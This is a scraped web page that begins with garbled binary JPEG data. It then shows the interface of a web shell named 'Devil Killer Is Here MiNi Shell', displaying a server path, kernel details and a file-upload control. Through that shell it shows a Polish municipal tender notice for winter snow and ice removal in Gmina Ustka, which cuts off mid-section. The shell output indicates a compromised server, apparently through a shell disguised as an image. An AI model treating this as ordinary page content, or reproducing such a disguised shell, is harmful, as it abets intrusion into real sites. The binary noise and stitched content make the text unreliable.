JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241122/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241122/0061013701-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Sukcesywne usługi usuwania śniegu oraz usuwania śliskości w sezonie zimowym 2024/25 dróg, chodników, ciągów pieszo – jezdnych Gminy Ustka </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Wójt Gminy Ustka</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 770979878</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Dunina 24</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Ustka</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">76-270</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL636 - Słupski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@ustka.ug.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.ustka.ug.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Sukcesywne usługi usuwania śniegu oraz usuwania śliskości w sezonie zimowym 2024/25 dróg, chodników, ciągów pieszo – jezdnych Gminy Ustka </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-bc74f586-c8e4-425e-b180-1bac4d9a5407</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00610137</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-11-22</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00015957/21/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.16 Sukcesywne usługi usuwania śniegu oraz usuwania śliskości w sezonie zimowym 2024/25 dróg, chodników, ciągów pieszo – jezdnych Gminy Ustka</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-bc74f586-c8e4-425e-b180-1bac4d9a5407 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie<br/>zamówienia publicznego komunikacja między Zamawiającym a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która<br/>jest dostępna pod adresem https://ezamowienia.gov.pl.<br/>2. Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/>3. Postępowanie jest prowadzone w języku polskim.<br/>4. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu<br/>„Wykonawca” na Platformie e-Zamówienia. S<br/>5. Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia<br/>ani logowania.<br/>6.Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści zapisanej<br/>w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady<br/>Ministrów w sprawie wymagań dla dokumentów elektronicznych.<br/>7. Dokumenty elektroniczne, o których mowa w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie wymagań dla<br/>dokumentów elektronicznych, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach<br/>rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, z uwzględnieniem rodzaju przekazywanych danych i<br/>przekazuje się jako załączniki. W przypadku formatów, o których mowa w art. 66 ust. 1 ustawy Pzp, ww. regulacje nie będą miały<br/>bezpośredniego zastosowania.<br/>8. Informacje, oświadczenia lub dokumenty, inne niż wymienione w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie<br/>wymagań dla dokumentów elektronicznych, przekazywane w postępowaniu sporządza się w postaci elektronicznej:<br/>a. w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności (i<br/>przekazuje się jako załącznik),<br/>lub<br/>b. jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej (np. w treści<br/>wiadomości e-mail lub w treści „Formularza do komunikacji”).<br/>9. Jeżeli dokumenty elektroniczne, przekazywane przy użyciu środków komunikacji elektronicznej, zawierają informacje stanowiące<br/>tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (Dz. U.<br/>z 2020 r. poz. 1913 oraz z 2021 r. poz. 1655) wykonawca, w celu utrzymania w poufności tych informacji, przekazuje je w<br/>wydzielonym i odpowiednio oznaczonym pliku, wraz z jednoczesnym zaznaczeniem w nazwie pliku „Dokument stanowiący tajemnicę<br/>przedsiębiorstwa”.<br/>10. Komunikacja w postępowaniu, z wyłączeniem składania ofert/wniosków o dopuszczenie do udziału w postępowaniu, odbywa się<br/>drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do<br/>komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień,<br/>zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej<br/>wiadomości (przycisk „dodaj załącznik”). W przypadku załączników, które są zgodnie z ustawą Pzp lub rozporządzeniem Prezesa<br/>Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych opatrzone kwalifikowanym podpisem elektronicznym,<br/>podpisem zaufanym lub podpisem osobistym, mogą być opatrzone, zgodnie z wyborem wykonawcy/wykonawcy wspólnie<br/>ubiegającego się o udzielenie zamówienia/podmiotu udostępniającego zasoby, podpisem zewnętrznym lub wewnętrznym. W<br/>zależności od rodzaju podpisu i jego typu (zewnętrzny, wewnętrzny) dodaje się do przesyłanej wiadomości uprzednio podpisane<br/>dokumenty wraz z wygenerowanym plikiem podpisu (typ zewnętrzny) lub dokument z wszytym podpisem (typ wewnętrzny).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Stosownie do art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych osobowych)<br/>(Dz. Urz. UE L 119 z 04 maja 2016 r., str. 1 – „RODO”) Zamawiający informuje, iż administratorem danych osobowych jest Gmina<br/>Ustka ul. Dunina 24, 76-270 Ustka reprezentowana przez Wójta Gminy Ustka. Administrator wyznaczył Inspektora Ochrony Danych<br/>Osobowych p. Pani Katarzyna Jakubowska, e-mail: iod@ustka.ug.gov.pl;, z którym w sprawach dotyczących przetwarzania danych<br/>osobowych można skontaktować się za pośrednictwem poczty elektronicznej pod adresem iod@ustka.ug.gov.pl lub telefonicznie<br/>pod numerem 693 064 318.<br/>2. Zamawiający przetwarza dane osobowe zebrane w niniejszym postępowaniu o udzielenie zamówienia publicznego w sposób<br/>gwarantujący zabezpieczenie przed ich bezprawnym rozpowszechnianiem.<br/>3. Zamawiający udostępnia dane osobowe, o których mowa w art. 10 RODO w celu umożliwienia korzystania ze środków ochrony<br/>prawnej, o których mowa w dziale VI PZP, do upływu terminu do ich wniesienia.<br/>4. Do przetwarzania danych osobowych, o których mowa w art. 10 RODO mogą być dopuszczone wyłącznie osoby posiadające<br/>upoważnienie. Osoby dopuszczone do przetwarzania takich danych są obowiązane do zachowania ich w poufności.<br/>5. Dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z prowadzeniem niniejszego<br/>postępowania o udzielenie zamówienia publicznego oraz jego rozstrzygnięciem, jak również, jeżeli nie ziszczą się przesłanki<br/>określone w art. 255-256 PZP – w celu zawarcia umowy w sprawie zamówienia publicznego oraz jej realizacji, a także<br/>udokumentowania postępowania o udzielenie zamówienia i jego archiwizacji.<br/>6. Odbiorcami danych osobowych będą osoby lub podmioty, którym dokumentacja postępowania zostanie udostępniona w oparciu o<br/>przepisy PZP.<br/>7. Dane osobowe pozyskane w związku z prowadzeniem niniejszego postępowania o udzielenie zamówienia publicznego będą<br/>przechowywane, zgodnie z art. 78 ust. 1 PZP, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia<br/>publicznego, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy w sprawie<br/>zamówienia publicznego.<br/>8. Niezależnie od postanowień pkt 7 powyżej, w przypadku zawarcia umowy w sprawie zamówienia publicznego, dane osobowe<br/>będą przetwarzane do upływu okresu przedawnienia roszczeń wynikających z umowy w sprawie zamówienia publicznego.<br/>9. Dane osobowe pozyskane w związku z prowadzeniem niniejszego postępowania o udzielenie zamówienia mogą zostać<br/>przekazane podmiotom świadczącym usługi doradcze, w tym usługi prawne, i konsultingowe.<br/>10. Stosownie do art. 22 RODO, decyzje dotyczące danych osobowych nie będą podejmowane w sposób zautomatyzowany</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Klauzula RODO została zawarta w pkt 34 SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RR.271.48.2024.MA</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">8</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> a) część I: rejon nr 1 – sołectwo Przewłoka (części składowe: Przewłoka, Orzechowo, Zapadłe)<br/>Zakres zamówienia obejmuje usługę mechanicznego usuwania śniegu oraz usuwania śliskości (piaskiem, mieszanką piasku<br/>i soli 3:1) po stwierdzeniu mżawki, lodowicy, gołoledzi, szadzi, szronu, śliskości pośniegowej.<br/>Wykonawca w celu realizacji przedmiotu umowy zobowiązany jest do;<br/>1) prowadzenia całodobowych obserwacji zjawisk atmosferycznych mających wpływ na stan nawierzchni dróg, chodników i<br/>ciągów pieszo-jezdnych oraz mają wpływ na samodzielne podjęcie działań,<br/>2) samodzielne przystąpienia do odśnieżania nawierzchni dróg, chodników, ciągów pieszo – jezdnych na terenie Gminy<br/>Ustka (zgodnie z załącznikiem graficznym) po stwierdzeniu warstwy zalegania śniegu o grubości powyżej 5 cm, w czasie do<br/>dwóch godzin od ustania opadów śniegu lub po wystąpieniu śliskości nawierzchni – bez dodatkowego zlecenia usług;<br/>jednakże Zamawiający ma prawo wstrzymać prace Wykonawcy w ciągu 15 min od otrzymania od niego wiadomości o<br/>planowanym przystąpieniu do prac;<br/>3) informowania każdorazowo Zamawiającego o rozpoczęciu i zakończeniu czynności wskazanych w pkt 2) - wiadomością<br/>SMS na numer tel…...(zostanie podany w dniu podpisania umowy);<br/>4) zapewnienia stałej łączności telefonicznej z upoważnionym pracownikiem Urzędu Gminy Ustka oraz z Sołtysem lub<br/>Radnym danej miejscowości;<br/>5) do uprzątnięcia i wywozu nadmiaru pozostałego piasku z dróg, chodników i ciągów pieszo-jezdnych swojej części<br/>przedmiotu zamówienia.<br/>Podstawą do rozliczenia będą zliczone długości wykonanych odcinków dróg, chodników i ciągów pieszo-jezdnych oraz<br/>kontrolne wydruki z przekazanych Wykonawcy przez Zamawiającego urządzeń GPS potwierdzające wykonanie usługi.<br/>Zamawiający może zlecić Wykonawcy wykonanie dodatkowych usług i przystąpienie do ich realizacji powinno nastąpić<br/>miejscowości wskazanej w § 1 ust. 1 umowy lub upoważnionego pracownika Urzędu Gminy Ustka, które może być<br/>przekazane w ciągu całej doby.<br/>Wykonawca ubiegający się o zamówienie powinien dysponować:<br/>- pojazdem z pługiem śnieżnym do mechanicznego usuwania śniegu z nawierzchni dróg, ciągów pieszo – jezdnych,<br/>- pojazdem z pługiem śnieżnym do mechanicznego usuwania śniegu z nawierzchni chodników o masie całkowitej do 2,5 Mg,<br/>- pojazdem ze sprzętem do usuwania śliskości (sypanie piachem i mieszanką piachu i soli 3:1),<br/>Pojazdy muszą mieć możliwość podłączenia przekazanego przez Zamawiającego urządzenia GPS do gniazda zapalniczki.<br/>Przez pojazd należy rozumieć pojazd o napędzie spalinowym, elektrycznym, hybrydowym (samochód ciężarowy, ciągnik,<br/>maszyna drogowa, koparka, koparko – ładowarka).<br/>Przez pług śnieżny należy rozumieć urządzenie składające się z odkładnicy, lemiesza i zawieszenia, montowane na nośniku<br/>pługa.<br/>Przez usuwanie śliskości należy rozumieć usunięcie z nawierzchni drogi lodu lub zlodowaciałego albo ubitego śniegu przy<br/>użyciu środków chemicznych, uszorstniających lub mechanicznych albo środków tych łącznie.<br/>Przez sprzęt do usuwania śliskości należy rozumieć rozsypywarki (piaskarki, solarki, piaskarko-solarki), dozujące i<br/>rozsypujące materiały, urządzenia współpracujące, np. ładowarki w składowiskach materiałów, zbiorniki solanki, itp.<br/>Zamawiający informuje, iż drogi o nawierzchni betonowej nie mogą być posypywane mieszanką piasku i soli a jedynie<br/>piaskiem. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-04-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena spełniania warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą<br/>„spełnia”/„nie spełnia”, w oparciu o informacje zawarte w dokumentach i oświadczeniach, o których mowa w rozdziale 17 SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas podstawienia pojazdu zastępczego w przypadku wystąpienia awarii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> część II rejon nr 2 – sołectwo Grabno, rejon nr 19 – sołectwo Zimowiska, rejon nr 4 – sołectwo Charnowo, rejon nr 5 –<br/>sołectwo Niestkowo, rejon nr 17 – sołectwo Machowino<br/>Zakres zamówienia obejmuje usługę mechanicznego usuwania śniegu oraz usuwania śliskości (piaskiem, mieszanką piasku<br/>i soli 3:1) po stwierdzeniu mżawki, lodowicy, gołoledzi, szadzi, szronu, śliskości pośniegowej.<br/>Wykonawca w celu realizacji przedmiotu umowy zobowiązany jest do;<br/>1) prowadzenia całodobowych obserwacji zjawisk atmosferycznych mających wpływ na stan nawierzchni dróg, chodników i<br/>ciągów pieszo-jezdnych oraz mają wpływ na samodzielne podjęcie działań,<br/>2) samodzielne przystąpienia do odśnieżania nawierzchni dróg, chodników, ciągów pieszo – jezdnych na terenie Gminy<br/>Ustka (zgodnie z załącznikiem graficznym) po stwierdzeniu warstwy zalegania śniegu o grubości powyżej 5 cm, w czasie do<br/>dwóch godzin od ustania opadów śniegu lub po wystąpieniu śliskości nawierzchni – bez dodatkowego zlecenia usług;<br/>jednakże Zamawiający ma prawo wstrzymać prace Wykonawcy w ciągu 15 min od otrzymania od niego wiadomości o<br/>planowanym przystąpieniu do prac;<br/>3) informowania każdorazowo Zamawiającego o rozpoczęciu i zakończeniu czynności wskazanych w pkt 2) - wiadomością<br/>SMS na numer tel…...(zostanie podany w dniu podpisania umowy);<br/>4) zapewnienia stałej łączności telefonicznej z upoważnionym pracownikiem Urzędu Gminy Ustka oraz z Sołtysem lub<br/>Radnym danej miejscowości;<br/>5) do uprzątnięcia i wywozu nadmiaru pozostałego piasku z dróg, chodników i ciągów pieszo-jezdnych swojej części<br/>przedmiotu zamówienia.<br/>Podstawą do rozliczenia będą zliczone długości wykonanych odcinków dróg, chodników i ciągów pieszo-jezdnych oraz<br/>kontrolne wydruki z przekazanych Wykonawcy przez Zamawiającego urządzeń GPS potwierdzające wykonanie usługi.<br/>Zamawiający może zlecić Wykonawcy wykonanie dodatkowych usług i przystąpienie do ich realizacji powinno nastąpić<br/>niezwłocznie jednak nie później niż przed upływem 2 godzin po otrzymaniu telefonicznego zlecenia od Sołtysa lub Radnego<br/>miejscowości wskazanej w § 1 ust. 1 umowy lub upoważnionego pracownika Urzędu Gminy Ustka, które może być<br/>przekazane w ciągu całej doby.<br/>Wykonawca ubiegający się o zamówienie powinien dysponować:<br/>- pojazdem z pługiem śnieżnym do mechanicznego usuwania śniegu z nawierzchni dróg, ciągów pieszo – jezdnych,<br/>- pojazdem z pługiem śnieżnym do mechanicznego usuwania śniegu z nawierzchni chodników o masie całkowitej do 2,5 Mg,<br/>- pojazdem ze sprzętem do usuwania śliskości (sypanie piachem i mieszanką piachu i soli 3:1),<br/>Pojazdy muszą mieć możliwość podłączenia przekazanego przez Zamawiającego urządzenia GPS do gniazda zapalniczki.<br/>Przez pojazd należy rozumieć pojazd o napędzie spalinowym, elektrycznym, hybrydowym (samochód ciężarowy, ciągnik,<br/>maszyna drogowa, koparka, koparko – ładowarka).<br/>Przez pług śnieżny należy rozumieć urządzenie składające się z odkładnicy, lemiesza i zawieszenia, montowane na nośniku<br/>pługa.<br/>Przez usuwanie śliskości należy rozumieć usunięcie z nawierzchni drogi lodu lub zlodowaciałego albo ubitego śniegu przy<br/>użyciu środków chemicznych, uszorstniających lub mechanicznych albo środków tych łącznie.<br/>Przez sprzęt do usuwania śliskości należy rozumieć rozsypywarki (piaskarki, solarki, piaskarko-solarki), dozujące i<br/>rozsypujące materiały, urządzenia współpracujące, np. ładowarki w składowiskach materiałów, zbiorniki solanki, itp.<br/>Zamawiający informuje, iż drogi o nawierzchni betonowej nie mogą być posypywane mieszanką piasku i soli a jedynie<br/>piaskiem. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-04-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria 